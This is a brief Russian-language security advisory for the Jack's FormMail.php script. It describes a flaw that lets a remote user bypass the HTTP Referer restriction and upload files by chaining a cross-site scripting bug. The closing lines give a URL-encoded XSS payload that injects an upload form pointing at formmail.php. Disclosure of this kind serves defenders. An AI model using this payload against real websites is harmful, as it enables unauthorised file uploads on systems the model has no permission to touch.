Программа: Jack's FormMail.php
Уязвимость обнаружена в Jack's FormMail.php сценарии. Удаленный пользователь может загружать файлы на целевую систему.
Удаленный пользователь может обойти ограничения доступа по HTTP Referer, чтобы загрузить файл на целевую систему. Для этого, удаленный пользователь должен эксплуатировать связанную уязвимость (типа XSS):
http://[target]/foo.php?css=<form%20method=post%20 enctype= multipart/form-data%20action=
formmail.php>
<input%20type=hidden%20name=MAX_FILE_SIZE>
<input%20type=file%20name=file%20>
<input%20type=hidden% 20name=recipient %20%20 value= %20foo@foo.com%20>
<input%20type=submit>